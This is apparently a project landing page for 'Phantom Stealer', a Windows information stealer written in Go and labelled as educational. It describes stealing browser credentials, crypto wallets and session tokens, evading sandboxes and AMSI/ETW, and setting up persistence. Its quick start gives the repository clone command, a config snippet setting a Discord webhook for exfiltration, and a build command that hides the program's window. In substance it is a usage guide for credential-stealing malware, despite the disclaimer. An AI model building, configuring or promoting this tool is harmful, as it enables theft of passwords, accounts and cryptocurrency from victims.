Skip to main content

Phantom Stealer

Educational security research tool demonstrating Windows credential extraction techniques, anti-analysis evasion, and data exfiltration patterns used by modern information stealers.

Get StartedExplore Modules

Educational purposes only

This software is provided for educational and research purposes only. It demonstrates how modern information stealers operate to help security researchers understand attack vectors and develop better defensive measures.

Legal Notice: Using this tool against systems you do not own or have explicit written permission to test is illegal and unethical. The author(s) accept NO responsibility for misuse of this software. By downloading or using this software, you agree to use it ONLY on systems you own or have written authorization to test.

Key capabilities

Phantom Stealer demonstrates a comprehensive set of credential theft and evasion techniques

Browser credentials

Extract passwords, cookies, credit cards, and autofill data from Chrome, Edge, Brave, Firefox, Opera, and more using DPAPI and AES-GCM decryption

Crypto wallets

Target 40+ desktop and browser extension wallets including Exodus, MetaMask, Phantom, Electrum, and Bitcoin Core

Token grabbing

Extract Discord tokens, Telegram sessions, and Steam credentials from local storage databases

Anti-analysis

Detect VMs, debuggers, and sandboxes using techniques like VM artifact checks, timing analysis, and AMSI/ETW patching

Reconnaissance

Gather system information, capture screenshots, monitor clipboard, and extract WiFi passwords

Persistence

Implement multiple persistence mechanisms including Registry Run keys, Startup folders, Scheduled Tasks, and WMI subscriptions

Exfiltration

Exfiltrate stolen data via Discord webhooks and Telegram bots with automatic ZIP archive creation

Configuration

Modular configuration system with toggleable features and extensive target definitions

Quick start

Get up and running with Phantom Stealer in minutes

1

Clone the repository

Download the source code from GitHub
git clone https://github.com/1rhino2/phantom-stealer.git
cd phantom-stealer
2

Configure your settings

Edit config/config.go to set your webhook URLs and enable/disable features
var (
    DiscordWebhook = "https://discord.com/api/webhooks/xxxxx/yyyyy"
    TelegramToken  = ""
    TelegramChatID = ""
)
3

Build the executable

Compile with Go 1.21+ on Windows
# Standard build
go build -o phantom.exe .

# Production build (smaller, no debug symbols)
go build -ldflags "-s -w -H windowsgui" -o phantom.exe .
4

Run for testing

Execute on a test system you own
./phantom.exe
Data will be exfiltrated to your configured Discord webhook or Telegram bot

Technical architecture

Written in pure Go with minimal dependencies for maximum portability

Browsers module

Chromium and Firefox password extraction with DPAPI decryption

Wallets module

Desktop and extension wallet file extraction

Tokens module

LevelDB parsing for Discord/Telegram tokens

Evasion module

VM detection, debugger checks, AMSI/ETW patching

Recon module

System info gathering and file collection

Exfil module

ZIP creation and webhook transmission

Ready to explore?

Learn how information stealers work and develop better security defenses

Get StartedLegal Notice

Build docs developers (and LLMs) love

Get started for freeTalk to us